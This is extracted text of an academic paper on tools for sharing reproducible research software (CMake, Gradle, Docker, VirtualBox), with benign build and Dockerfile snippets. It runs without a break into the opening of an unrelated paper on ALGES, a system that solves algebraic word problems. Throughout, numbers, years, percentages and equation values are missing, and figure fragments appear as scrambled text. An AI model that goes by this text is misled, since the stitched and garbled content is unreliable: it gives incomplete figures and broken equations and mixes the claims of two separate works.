effort for installation and execution: moderate/high | little | little | little
size of shared object: small | small | up to multiple gbs | up to multiple gbs
limitations: installation could be exhausting | specific gradle project structure recommended | gui requires extra effort | images always include the entire operating system
effort for sharing cmake, gradle, and other build management systems are intended to define a standardized build process. if a build management system is used during the development of the scientific software artifact, no additional effort arises for sharing. the configuration file for the build management system can be shared along with the source code of the software artifact. docker and virtualbox are usually not directly involved in software development. in most cases, a docker or virtualbox image has to be created explicitly for sharing the software artifact. the structured process of building a docker container allows easy reuse of existing docker containers for other software artifacts. in the case of virtualbox, the whole virtualbox image has to be shared on a file server. docker images can be shared on the free-to-use docker hub or on a file server. alternatively, a dockerfile, which contains the building instructions for a docker image, can be created and shared as a text file. however, using a dockerfile requires all dependencies to be available in repositories, which adds complexity to the overall process. required knowledge for installation and execution researchers are often not familiar with the tools used for the creation of software artifacts. reading the documentation of build management tools can be exhausting and time-consuming for a short test of an artifact. cmake and gradle require some knowledge in order to build a software artifact, especially if errors appear. virtualbox and docker are easier to use. if a docker image is hosted on docker hub, a single command is sufficient for downloading and running the image. if this command is provided, no additional knowledge is required. due to a graphical user interface, running a virtualbox image is even easier. effort for installation and execution according to the survey results, ease of installation is a major consideration for most researchers ( of participants). regarding the installation of the used tool itself, gradle has the lowest requirements. the gradle wrapper allows installing dependencies and building artifacts without installing gradle itself. for installing and executing the shared software artifact, the highest effort arises when using cmake, where required dependencies have to be installed manually. for building and executing software artifacts with gradle, only a few commands are required. docker and virtualbox require the least effort; the shared image only needs to be executed.
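the difference in installation and execution effort can be illustrated by the commands a user would typically have to run for each class of tool. the package names, repository layout, and image name below are placeholders for illustration only, not the actual artifacts discussed in this article.

```bash
# cmake-based artifact: dependencies must first be installed by hand (package names are placeholders)
sudo apt-get install libfoo-dev libbar-dev
cmake -S . -B build
cmake --build build

# gradle-based artifact: the wrapper fetches gradle and all declared dependencies automatically
./gradlew build

# docker-based artifact: a single command downloads and runs the prepared image
docker run --rm example/artifact:latest
```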
size of shared object when using cmake or gradle, the source code of the software artifact and the configuration file of the build management tool have to be shared, which usually leads to small shared objects. the shared image of docker or virtualbox has to contain the source code and all other tools which are required for execution, such as the operating system. this results in large shared objects, in some cases the size of a docker image exceeds one gigabyte. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ alternatively, docker provides an option allowing for smaller shared objects— dockerfiles. a dockerfile contains only text instructions for building a docker image. therefore, the size of a dockerfile is only a few kilobytes, but once executed, docker automatically pulls the artifact’s source code from provided repositories and builds the software artifact, resulting in a large docker image on the local machine. nevertheless, the size of the download is not a major concern for the majority of the survey participants. limitations all analyzed tools have limitations. cmake is a lightweight tool for software development, but the effort for installing the dependencies of a software artifact could be extensive. furthermore, it is only applicable for a handful of programming languages such as c or c++. when gradle is chosen as build system early in the development phase, it is perfectly suited for java projects. using gradle for existing projects can be cumbersome because it requires additional configuration for projects that do not comply with gradle’s default project structure. especially for researchers that are not familiar with gradle, the time spent for this additional configuration step should not be neglected. docker is perfectly suited for command-line or web applications, which is the case for a huge amount of scientific software artifacts. additional configuration is required to support guis of desktop applications. frevo (see the section “frevo”), used in one of our examples, demonstrates gui support for desktop applications with docker. virtualbox is applicable for all types of software artifacts, but the overhead of creating and sharing a virtualbox image could be huge. for sharing an artifact, independent of its size and complexity, a complete operating system has to be installed and shared. examples after introducing background information in the last sections, three examples are presented analyzing the applicability of various tools for sharing software artifacts. three scientific artifacts from different computer science research areas allowed us to focus on various types of artifacts with different build systems and procedures for sharing. the first example—stochastic adaptive forwarding—is a simulation scenario, which can be executed on a command line in order to conduct performance evaluations. second, frevo is a simulation tool, mainly controlled via a graphical user interface. the third example—liresolr—is a server-based application used for image retrieval. stochastic adaptive forwarding stochastic adaptive forwarding (saf) (posch, rainer & hellwagner, ) is a forwarding strategy for the novel internet architecture named data networking (ndn) (zhang et al., ). forwarding strategies in ndn are responsible for forwarding packets to neighboring nodes and therefore select the paths of traffic flows in the network. 
the network forwarding daemon (nfd) implements the networking functionalities of ndn. it is written in c++ and uses the waf build automation system. the network simulator ns- /ndnsim (mastorakis et al., ) is used for testing purposes, which also uses the waf build system. for testing saf in the simulation environment three steps are required: (i) installation of the nfd; (ii) installation of the network simulator elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ns- /ndnsim and finally (iii) patching saf into a compatible version of the nfd. the installation of saf was tested and analyzed in the standard way by using waf and docker. saf with waf the standard way of developing ndn forwarding strategies is by using the waf build automation system. the functionality of the waf build system is similar to the functionality of cmake. this means that waf automatically resolves dependencies, but the installation of dependencies must be performed manually. although extensive installation instructions were published (https://github.com/danposch/saf, last visited - - ), it is tricky to install the simulator and its dependencies. furthermore, there are slightly undocumented differences when installing the ndn framework on different unix versions. once the ndn framework is compiled in the correct version, it is easy to patch saf. nevertheless, it can take up to several hours to initially install and compile the ndn framework with saf. saf with docker named data networking and saf are licensed under gpl v , meaning that there are no legal concerns over packaging the software. technically, docker provides two options for creating and sharing images. the first is to check out a preconfigured image like ubuntu linux from the docker website and connect to it via terminal. all required changes can be made in the terminal and finally persisted with a commit. the altered image can be shared via the docker website or as binary file. the second possibility to create the image is by using dockerfiles. these files contain simple creation instructions for images and can be shared easily due to their small size. to build an image, the dockerfile can be executed on any host with the docker framework installed. both variants were tested for saf. the resulting images, containing all dependencies and the compiled software artifacts, have a size of about . gb with the size of the dockerfile being about two kb. using the precompiled image (https://hub.docker.com/r/ phmoll/safprebuild/, last visited - - ), running the image only takes an instant. the execution of the dockerfile takes, depending on the internet connection and the computing power of the host system, between and min. once the image is running, the results of the paper can be reproduced or new experiments with saf can be conducted using the provided network simulator. frevo frevo (sobe, fehérvári & elmenreich, ) is an open source framework to help engineers and scientists in evolutionary design or optimization tasks to create a desired swarm behavior. the major feature of frevo is the component-wise decomposition and separation of the key building blocks for an optimization task. this structure enables the components to be designed separately allowing the user to easily swap and evaluate different configurations and methods or to connect an external simulation tool. 
frevo is typically used for evolving swarm behavior for a given simulation (fehervari & elmenreich, ; monacchi, zhevzhyk & elmenreich, ). frevo is a mid-sized project with k lines of mostly java code, having a graphical interface as well as a mode for pure command line operation, for example, to be used on a simulation server. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/danposch/saf https://hub.docker.com/r/phmoll/safprebuild/ https://hub.docker.com/r/phmoll/safprebuild/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the component-based structure allows to easily extend and remove components (e.g., a simulation, a type of neural network, an optimization algorithm), which sometimes creates some effort in newly setting up frevo. frevo was tested and analyzed with the following three tools: frevo with build script until recently, frevo was provided as a download zip file (http://frevo.sourceforge.net/, last visited: - - ) that included sources of the main program and additional components together with an ant build file. however, there had been problems in the past with different language versions of java. a further problem can be dependencies on third party tools or libraries, which are not automatically maintained by this type of build script. frevo with gradle an analysis showed that the current structure of frevo, especially due to its component- plug-in-architecture, conflicts with the expected and possible project structure for gradle. frevo with docker since frevo and its components are open source under gpl v , there was neither a legal nor a technical problem to put it into a virtual docker container. we used an ubuntu linux system that was provided by docker. openjdk was installed as java runtime environment. after installing frevo in the docker system, it was pushed onto the free docker hub hosting platform (https://hub.docker.com/r/frodewin/frevo/, last visited: - - ). to reproduce a result made with frevo it thus possible to (given that docker is installed) download and execute the respective docker container. in general, the result was easily usable, apart from some effort to get a graphical display working. the parallelization of simulation, which is a natural ability of frevo, works fine as well inside a docker container. the docker image containing frevo has a compressed size of mb, which is mostly due to the files of ubuntu linux. liresolr liresolr (lux & macstravic, ) is an extension for the popular apache solr (http://lucene.apache.org/solr/, last visited - - ) text retrieval server to add functionality for visual information retrieval. it adds support for indexing and searching images based on image features and is for instance in use by the world intellectual property organisation, a un agency, within the global brand db (http://www.wipo.int/ branddb/en/, last visited - - ) for retrieval of similar visual trademarks. liresolr brings the functionality of the lire library (lux & marques, ) to the popular search server. while lire is a library for visual information retrieval based on inverted indexes, it is research driven and intented to be integrated with local java applications. apache solr is more popular than the underlying inverted index system, lucene, as it allows to modularize retrieval functionality by providing a specific retrieval server with cloud functionality and multiple apis to access it for practical use. 
liresolr is intended for people who need out of the box visual retrieval methods without the need for integrating a library in their applications. it can be called from any mobile, elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://frevo.sourceforge.net/ https://hub.docker.com/r/frodewin/frevo/ http://lucene.apache.org/solr/ http://www.wipo.int/branddb/en/ http://www.wipo.int/branddb/en/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ server or desktop platform and runs on systems with a java runtime. this flexibility is valued among researchers as well as practitioners. liresolr is hosted on github (https://github.com/dermotte/liresolr, last visited - - ). gradle and docker build files are part of the repository. liresolr with gradle the standard method of building liresolr is by using gradle. current ides can import gradle build files; any task can be done from within the ide. while gradle makes sure that the right version for each library is downloaded and everything is ready to build, installing the new features to the solr server has to be done manually. the supporting task in gradle just exports the necessary jar files. the user or developer has to install solr, then create a solr core, change two configuration files, copy the jars and restart the server to complete the installation. while these steps are extensively described in the documentation, it still presents a major effort for new users without prior experience of retrieval in general or using apache solr. liresolr with docker as liresolr is extending solr by adding additional functionality, the intuitive way to create a docker container is to extend the solr docker container. the dockerfile defining the build of the docker container is part of the liresolr repository, where a specific gradle task is building and preparing relevant files for the creation of the image. this includes the aforementioned jars and config files as well as a pre prepared solr core and a small web application as a client. the docker container can easily be run and provides basic functionality for digital image search. developers who just want to test liresolr can get it running within seconds using docker hub (https://hub.docker.com/r/dermotte/liresolr/, last visited: - - ). one tool to reproduce them all? in the previous sections, we presented tools for sharing software artifacts and examples showing how the tools can be applied in order to share scientific software artifacts. in this section, we now reflect on the advantages and shortcomings of the tools with respect to the results from our survey presented in the section “survey”. each of the presented tools has its pros and cons. for instance, the additional effort for sharing an artifact when using a build management tool is very low because in most cases a build management tool is used during the creation of the artifact. in contrast, it can be challenging and time-consuming for other researchers to get the build management tool up and running because required dependencies or the installation process may not be documented in detail. software artifacts, which are provided as virtualized containers are easy to run and provide a high degree of security but are inconvenient in case a researcher wants to build upon previously published software artifacts. when weighing these advantages and shortcomings we quickly see that the one tool to reproduce all our scientific results does not exist. 
nevertheless, based on our findings from the survey, we now want to give recommendations for creating reproducible results and scientific software artifacts which can be easily used by other researchers. the survey clearly showed that many researchers are interested in building their research on the work of others, which becomes much easier when published software artifacts can be reused. furthermore, we saw that the average time researchers are willing to invest to get artifacts running is only about two days. thus, we assume that it is very important for researchers to get the artifact running quickly; otherwise, researchers lose interest in using the artifact and start developing their own solution. when taking the demand for security into account, we see that virtualized containers appear to be a good choice. the provided software artifact can be executed without the overhead of installing it, by simply running the container. furthermore, it is possible to become familiar with the artifact in the virtualized environment and check if the artifact is suitable as a basis for one's own work. our findings mostly discuss the perspective of researchers working on original research questions. the role of a reviewer in a peer review process has not been discussed in the same detail, but we assume that it is similar to the researchers' demands, with even more demanding time constraints. when researchers decide to build on the artifact, it may be cumbersome to continue using a virtualized container, because altering a software artifact is more convenient on a local system. this means that the researcher has to install the artifact locally, without a virtualized container. according to our study, researchers currently prefer providing detailed instructions and build tools. relying solely on this information, it could be challenging to install the artifact, as already discussed. dockerfiles are one solution to overcome this issue. as already explained, a dockerfile is a kind of construction guideline for docker containers. it contains all command-line directives which are required to build a docker container and can therefore be seen as an exact procedure for the local installation of an artifact (a minimal sketch is shown below). following the commands listed in the dockerfile, local installation of a software artifact is relatively easy. these commands ensure that all dependencies are installed correctly, otherwise it would not be possible to create a docker container. this means that by providing a dockerfile, both options become possible: software artifacts can be executed in a secure container, but can also be easily installed by following the instructions from the dockerfile. another finding of our survey is that the long-term availability of software artifacts is important for researchers and should be around years. in addition, the acm artifact reviewing and badging guideline (https://www.acm.org/publications/policies/artifact-review-badging, last visited - - ) emphasizes the importance of being able to reproduce results after a long time, by providing a separate badge for artifacts which are archived in archival repositories. when looking at our presented tools, we can see technical as well as legal issues on the way to achieving long-term availability.
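as referenced above, a dockerfile makes the installation procedure explicit. the following sketch is a hypothetical recipe for a java artifact built with gradle; the base image, working directory, and jar name are placeholder choices and do not correspond to the liresolr or frevo images discussed in this article.

```dockerfile
# Dockerfile -- hypothetical recipe for packaging a gradle-built java artifact
# (base image, paths, and jar name are placeholders)
FROM eclipse-temurin:17-jdk

WORKDIR /opt/artifact

# copy the sources and build them; every step is spelled out explicitly,
# so the same commands double as local installation instructions
COPY . .
RUN ./gradlew --no-daemon build

# default command executed when the container is run
CMD ["java", "-jar", "build/libs/artifact.jar"]
```

building the image with docker build -t example/artifact . and starting it with docker run --rm example/artifact gives the secure, containerized execution path, while the same build steps, typed manually, reproduce the local installation.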
although services, such as code ocean (https://codeocean.com/, last visited - - ) or dryad (https://datadryad.org/, last visited - - ), are available for archiving software artifacts, the following points should be kept in mind. tools such as gradle rely on online repositories for downloading required dependencies. if only one of the required dependencies becomes unavailable, the build fails. this means that all dependencies, as well as all required tools, have to be included when the artifact is archived. this leads to technical issues, because the amount of required tools to reproduce a result could be tremendously high. for instance, if a required operating system or compiler is no longer available, the results cannot be reproduced, which means that even these tools must be archived. besides this technical issue, packaging these tools could lead to legal issues as well when tools with limiting licenses are used. furthermore, operators of platforms for archiving software could decide to discontinue their service. this would result in the loss of all artifacts archived by this provider. conclusion this article reflects on the reproducibility of research results in computer science. we collected the opinions and requirements of researchers via an online survey. focusing on our research question rq (“to what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?”), analysis of the survey's results confirmed our initial assumption that the reproducibility of research results is an important concern in computer science research. besides, researchers not only want to reproduce results but also want to base their work on the results of others. the main reasons for the importance of reproducibility are improved credibility and improved understanding of results. using established commercial models, as they are common for scientific publications, was seen as critical. moreover, the majority of survey participants showed a willingness to use open source tools for making their results accessible and reproducible. based on the researchers' opinions, we created guidelines which aid researchers in making their research reproducible. the applicability of various tools for publishing software artifacts was discussed while keeping our guidelines in mind. scientific artifacts of different research areas in computer science were used to test the applicability of the discussed tools for sharing reproducible research. regarding research question rq (“what tools can be used to support reproducibility?”), we identified a conflict between comprehensibility and simplicity of using a tool vs. security measures that avoid compromising one's system when testing foreign code. available tools provide a variety of possible solutions; however, we could not identify a single tool fulfilling all requirements. finally, we discussed our findings and concerns on the process of publishing reproducible research. according to our study, the long-term availability of reproducible results is of great importance to many researchers, but we identified open issues in achieving availability for longer periods.
even if reproducibility of research is not common practice yet, we recognized a strong positive shift toward reproducible research, backed not only by individual researchers, but also by renowned scientific journals and publishers. with this work already leading to new insights regarding reproducibility, it also installs a beachhead for future research. with the survey as input and the discussions regarding the interpretation we identified the context of a researcher as a hypothetically highly influential factor on the view on reproducibility. so how do for instance not only cultural, geographical, and project background of a researcher, but also the research area as well as the research communities influence the willingness to investigate extra time in making results reproducible? future work could also address the question whether and to what extend project size would influence the willingness to invest time into reproducing work. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acknowledgements we would like to thank all participants of the survey for their valuable input and all colleagues who helped us by sharing their practical experience and discussion. we thank the anonymous reviewers for their constructive comments on a previous version of the article. we are grateful to lizyy dawes for proofreading an earlier version of this article. additional information and declarations funding this work was supported by the austrian science fund (fwf) under the chist-era project concert (project no. i ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: austrian science fund (fwf) under the chist-era project concert: i . competing interests the authors declare that they have no competing interests. author contributions � wilfried elmenreich conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � philipp moll conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � sebastian theuermann conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � mathias lux conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: links to the tools used are available in the article. this includes data and code produced by us as well as code from others where we have built upon. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ the following repositories contain parts deposited for the article: docker images: https://hub.docker.com/r/phmoll/saf-prebuild/ https://hub.docker.com/r/dermotte/liresolr/ https://hub.docker.com/r/frodewin/frevo/ we used a version of frevo software, sourceforge: http://frevo.sourceforge.net/. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references allen a, schmidt j. . looking before leaping: creating a software registry. journal of open research software ( ):e doi . /jors.bv. arbona a, artigues a, bona-casas c, massó j, miñano b, rigo a, trias m, bona c. . simflowny: a general-purpose platform for the management of physical models and simulation problems. computer physics communications ( ): – doi . /j.cpc. . . . boettiger c. . an introduction to docker for reproducible research. sigops operating systems review ( ): – . bonaventure o. . the january issue. sigcomm computer communication review ( ): – . brinckman a, chard k, gaffney n, hategan m, jones mb, kowalik k, kulasekaran s, ludäscher b, mecum bd, nabrzyski j, stodden v, taylor ij, turk mj, turner k. . computing environments for reproducibility: capturing the “whole tale”. future generation computer systems : – doi . /j.future. . . . casadevall a, fang fc. . reproducible science? infection and immunity ( ): – . chirigati f, shasha d, freire j. . reprozip: using provenance to support computational reproducibility. in: proceedings of the th usenix workshop on the theory and practice of provenance, tapp ’ . berkeley: usenix association, : – : . cito j, ferme vc, gall h. . using docker containers to improve reproducibility in software and web engineering research. in: ieee/acm th international conference on software engineering companion (icse-c). new york: acm, – . fehervari i, elmenreich w. . evolving neural network controllers for a team of self-organizing robots. journal of robotics : doi . / / . flittner m, mahfoudi mn, saucez d, wählisch m, iannone l, bajpai v, afanasyev a. . a survey on artifacts from conext, icn, imc, and sigcomm conferences in . sigcomm computer communication review ( ): – . hanson b, sugden a, alberts b. . making data maximally available. science ( ): doi . /science. . janin y, vincent c, duraffort r. . care, the comprehensive archiver for reproducible execution. in: proceedings of the st acm sigplan workshop on reproducible research methodologies and new publication models in computer engineering, trust ’ . new york: acm, : – : . elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://hub.docker.com/r/phmoll/saf-prebuild/ https://hub.docker.com/r/dermotte/liresolr/ https://hub.docker.com/r/frodewin/frevo/ http://frevo.sourceforge.net/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jors.bv http://dx.doi.org/ . /j.cpc. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lux m, macstravic g. . the lire request handler: a solr plug-in for large scale content based image retrieval. in: gurrin c, hopfgartner f, hurst w, johansen h, lee h, o’connor n, eds. multimedia modeling: th anniversary international conference, mmm , dublin, ireland, january - , . cham: springer international publishing, – . lux m, marques o. . 
visual information retrieval using java and lire. synthesis lectures on information concepts, retrieval, and services ( ): – . mastorakis s, afanasyev a, moiseenko i, zhang l. . ndnsim : an updated ndn simulator for ns- . technical report ndn- , revision , ndn. mcmurdie pj, holmes s. . phyloseq: an r package for reproducible interactive analysis and graphics of microbiome census data. plos one ( ): – doi . /journal.pone. . monacchi a, zhevzhyk s, elmenreich w. . hems: a home energy market simulator. computer science—research and development ( ): – . morin a, urban j, adams pd, foster i, sali a, baker d, sliz p. . shining light into black boxes. science ( ): – doi . /science. . peng rd. . reproducible research in computational science. science ( ): – doi . /science. . poline j-b, breeze jl, ghosh s, gorgolewski k, halchenko yo, hanke m, haselgrove c, helmer kg, keator db, marcus ds, poldrack ra, schwartz y, ashburner j, kennedy dn. . data sharing in neuroimaging research. frontiers in neuroinformatics : doi . /fninf. . . posch d, rainer b, hellwagner h. . saf: stochastic adaptive forwarding in named data networking. ieee/acm transactions on networking ( ): doi . /tnet. . . ram k. . git can facilitate greater reproducibility and increased transparency in science. source code for biology and medicine ( ): doi . / - - - . shrader-frechette k, oreskes n. . symmetrical transparency in science. science ( ): – doi . /science. . . . sobe a, fehérvári i, elmenreich w. . frevo: a tool for evolving and evaluating self-organizing systems. in: proceedings of the st international workshop on evaluation for self-adaptive and self-organizing systems, lyon. – . steiniger s, hunter aj. . the free and open source gis software map—a guide to facilitate research, development, and adoption. computers, environment and urban systems : – doi . /j.compenvurbsys. . . . vitek j, kalibera t. . repeatability, reproducibility and rigor in systems research. in: proceedings of the th international conference on embedded software emsoft , taipei. – . walters wp. . modeling, informatics, and the quest for reproducibility. journal of chemical information and modeling ( ): – doi . /ci w. witten dm, tibshirani r. . scientific research in the age of omics: the good, the bad, and the sloppy. journal of the american medical informatics association ( ): – doi . /amiajnl- - . zhang l, afanasyev a, burke j, jacobson v, claffy k, crowley p, papadopoulos c, wang l, zhang b. . named data networking. sigcomm computer communication review ( ): – .
parsing algebraic word problems into equations rik koncel-kedziorski, hannaneh hajishirzi, ashish sabharwal†, oren etzioni†, and siena dumas ang university of washington, †allen institute for ai {kedzior,hannaneh,sienaang}@uw.edu, {ashishs,orene}@allenai.org abstract this paper formalizes the problem of solving multi-sentence algebraic word problems as that of generating and scoring equation trees. we use integer linear programming to generate equation trees and score their likelihood by learning local and global discriminative models. these models are trained on a small set of word problems and their answers, without any manual annotation, in order to choose the equation that best matches the problem text. we refer to the overall system as alges. we compare alges with previous work and show that it covers the full gamut of arithmetic operations whereas hosseini et al. ( ) only handle addition and subtraction. in addition, alges overcomes the brittleness of the kushman et al. ( ) approach on single-equation problems, yielding a % to % reduction in error. introduction grade-school algebra word problems are brief narratives (see figure ). a typical problem first describes a partial world state consisting of characters, entities, and quantities. next it updates the condition of an entity or explicates the relationship between entities. finally, it poses a question about a quantity in the narrative. an ordinary child has to learn the required algebra, but will easily grasp the narrative utilizing extensive world knowledge, large vocabulary, word-sense disambiguation, coreference resolution, mastery of syntax, and the ability to combine individual sentences into a coherent mental model. (figure : example problem and solution. problem: oceanside bike rental shop charges dollars plus dollars an hour for renting a bike. tom paid dollars to rent a bike. how many hours did he pay to have the bike checked out? solution: + ( ∗ x) = .) in contrast, the challenge for an nlp system is to “make sense” of the narrative, which may refer to arbitrary activities like renting bikes, collecting coins, or eating cookies. previous work coped with the open-domain aspect of algebraic word problems by relying on deterministic state transitions based on verb categorization (hosseini et al., ) or by learning templates that cover equations of particular forms (kushman et al., ). we have discovered, however, that both approaches are brittle, particularly as training data is scarce in this domain, and the space of equations grows exponentially with the number of quantities mentioned in the math problem. we introduce alges, which maps an unseen multi-sentence algebraic word problem into a set of possible equation trees. figure shows an equation tree alongside the word problem it represents. alges generates the space of trees via integer linear programming (ilp), which allows it to constrain the space of trees to represent type-consistent algebraic equations satisfying as many desirable properties as possible (the code and data are publicly available at https://gitlab.cs.washington.edu/alges/tacl). alges learns to map spans of text to arithmetic operators, to combine them given the global context of the problem, and to choose the “best” tree corresponding to the problem. the training set for alges consists of unannotated algebraic word problems and their solutions. solving the equation represented by such a tree is trivial. alges is described in detail in section .
alges is able to solve word problems with single-variable equations like the ones in figure . in contrast to hosseini et al. ( ), alges covers +, −, ∗, and /. the work of kushman et al. ( ) has broader scope but we show that it relies heavily on overlap between training and test data. when that overlap is reduced, alges is % to % more accurate than this system. our contributions are as follows: ( ) we formalize the problem of solving multi-sentence algebraic word problems as that of generating and ranking equation trees; ( ) we show how to score the likelihood of equation trees by learning discriminative models trained from a small number of word problems and their solutions – without any manual annotation; and ( ) we demonstrate empirically that alges has broader scope than the system of hosseini et al. ( ), and overcomes the brittleness of the method of kushman et al. ( ). previous work our work is related to situated semantic interpretation, which aims to map natural language sentences to formal meaning representations (zelle and mooney, ; zettlemoyer and collins, ; ge and mooney, ; kwiatkowski et al., ). more closely related is work on language grounding, whose goal is the interpretation of a sentence in the context of a world representation (branavan et al., ; liang et al., ; chen et al., ; bordes et al., ; feng and lapata, ; hajishirzi et al., ; matuszek et al., ; hajishirzi et al., ; artzi and zettlemoyer, ; koncel-kedziorski et al., ; yatskar et al., ; seo et al., ; hixon et al., ). however, while most previous work considered individual sentences in isolation, solving word problems often requires reasoning across the multi-sentence discourse of the problem text. recent efforts in the math domain have studied number word problems (shi et al., ), logic puzzle problems (mitra and baral, ), arithmetic word problems (hosseini et al., ; roy et al., a), algebra word problems (kushman et al., ; zhou et al., ), and geometry word problems (seo et al., ). roy et al. ( b) introduce a system for reasoning about quantities, which they extend to arithmetic word problems that can be solved by choosing only two values from the text and applying an arithmetic operator. by comparison, our method learns to solve complex problems with many operands where the space of possible solutions is larger. hosseini et al. ( ) solve elementary addition and subtraction problems by learning verb categories. they ground the problem text to a semantics of entities and containers, and decide if quantities are increasing or decreasing in a container based upon the learned verb categories. while relying only on verb categories works well for + and −, modeling ∗ and / requires going beyond verbs. for instance, “tina has cats. john has more cats than tina. how many cats do they have together?” and “tina has cats. john has times as many cats as tina. how many cats do they have together?” have identical verbs, but the indicated operation (+ and ∗ resp.) is different. alges makes use of a richer semantic representation which facilitates deeper learning and a wider scope of application, solving problems involving the +, −, /, and ∗ operators (see table ). kushman et al. ( ) introduce a general method for solving algebra problems. this work can align a word problem to a system of equations with one or two unknowns. they learn a mapping from word problems to equation templates using global and local features from the problem text.
however, the large space of equation templates makes it challeng- ing for this model to learn to find the best equation directly, as a sufficiently similar template may not have been observed during training. instead, our method maps word problems to equation trees, tak- ing advantage of a richer representation of quanti- fied nouns and their properties, as well as the recur- sive nature of equation trees. these allow alges to use a bottom-up approach to learn the correspon- dence between spans of texts and arithmetic oper- ators (corresponding to intermediate nodes in the tree). alges then scores equations using global structure of the problem to produce the final result. our work is also related to research in using ilp to enforce global constraints in nlp appli- cations (roth and yih, ). most previous work (srikumar and roth, ; goldwasser and roth, ; berant et al., ; liu et al., ) uti- lizes ilp as an inference procedure to find the best global prediction over initially trained local classi- fiers. similarly, we use ilp to enforce global and domain specific constraints. we, however, use ilp to form candidate equations which are then used to generate training data for our classifiers. our work is also related to parser re-ranking (collins, ; ge and mooney, ), where a re-ranker model at- tempts to improve the output of an existing proba- bilistic parser. similarly, the global equation model designed in alges attempts to re-rank equations based on global problem structure. setup and problem definition given numeric quantities v and an unknown x whose value is the answer we seek, an equation over v and x is any valid mathematical expression formed by combining elements of v ∪{x} using bi- nary operators from o = {+,−,∗,/,=} such that x appears exactly once. when each element of v appears at most once in the equation, it may natu- rally be represented as an equation tree where each operator is a node with edges to its two operands. t denotes the set of all equation trees over v and x. problem formulation. we address the problem of solving grade-school algebra word problems that map to single equations. solving such a word prob- lem w amounts to selecting an equation tree t repre- senting the mathematical computation implicit in w. figure shows an example of w with quantities un- derlined, and the corresponding tree t. formally, we use a joint probability distribution p(t,w) that de- fines how “well” an equation tree t ∈ t captures the mathematical computation expressed in w. given a word problem w as input, our goal is to compute t̃ = arg maxt∈t p(t|w). problems involving simultaneous equations require com- bining multiple equation trees, one per equation. −( *x)= = ( *x)+ = (x* )+   .  train  local  model  (sec(on   . )   on  monday,    students  went  on  a  trip  to  the  zoo.  all    buses  were  filled   and    students  had  to  travel  in  cars.    how  many  students  were  in  each  bus  ?   qnt: ent: student qnt: ent: bus qnt: ent: student qnt: x ent: student ctr: bus .  ground  text  w  into  base  qsets  (sec(on   )   :  subset  of  t(w)  yielding  correct  solu(on   s   *s   -s   s   b   xs   =   s   =   +s   *s   s   b   xs   s   +s   -s   s   =   b   xs   ( b,xs) ( s,combine( b,xs)) ( b,xs) (combine( b,xs), s) .  use  ilp  to  generate  m  equa(on  trees  t(w)  (sec(on   )         .  train  global  model  (sec(on   . 
)                                        :  problem-­‐tree  pairs   +( *x)= = ( / x)+ −(x+ )= trlocal trglobal tl(w) :  operator  nodes  in  tl(w) t(w) \tl(w) training  example   label   * − * + posi>ve  examples   (from                            )   nega>ve  examples   (from                                                      )  tl(w) t(w) \tl(w) figure : an overview of the process of learning for a word problem and its qsets. an exhaustive enumeration over t quickly be- comes impractical as problem complexity increases and n = |v ∪ {x}| grows. specifically, |t| > h(n) = n! (n− )! (n− ) n− , h( ) = ,h( ) > . m,h( ) > b, etc. this vast search space makes it challenging for a discriminative model to learn to find t̃ directly, as a sufficiently similar tree may not have been observed during training. in- stead, our method first generates syntactically valid equation trees, and then uses a bottom-up approach to score equations with a local model trained to map spans of text to math operators, and a global model trained for coherence of the entire equation w.r.t. global problem text structure. overview of the approach figure gives an overview of our method, also detailed in figure . in order to build equation trees, we use a compact representation for each node called a quantified set or qset to model natural lan- guage text quantities and their properties (e.g., ‘ students’ in ‘ buses’). qsets are used for tracking and combining quantities when learning the corre- spondence between equation trees and text. definition . given a math word problem w, let s learning (word problems w , corresponding solutions l): . for every problem-solution pair (wi,`i) with wi ∈ w,`i ∈ l (a) s ← base qsets obtained by grounding text wi and reordering the resulting qsets (section ) (b) ti ← top m type-consistent equation tree candidates generated by ilp(wi) (section ) (c) t`i ← subset of ti that yields the correct numerical solution `i (d) add to trlocal features 〈s ,s 〉 with label op for each operator op combining qsets s ,s in trees in t`i (e) add to trglobal features 〈w,t〉 labeled positive for each t ∈ t`i and labeled negative for each t ∈ t \t`i . llocal ← train a local qset relationship model on trlocal (section . ) . gglobal ← train a global equation model on trglobal (section . ) . output local and global models (llocal,gglobal) inference (word problem w, local set relation model llocal , global equation model gglobal ): . s ← base qsets obtained by grounding text wi and reordering the resulting qsets (section ) . t ← top m type-consistent equation tree candidates generated by ilp(w) (section ) . t∗ ← arg maxti∈t (∏ tj∈t llocal(tj|w) ) ×gglobal(t|w), scoring each tree ti ∈ t based on equation . ` ← numeric solution to w obtained by solving equation tree t∗ for the 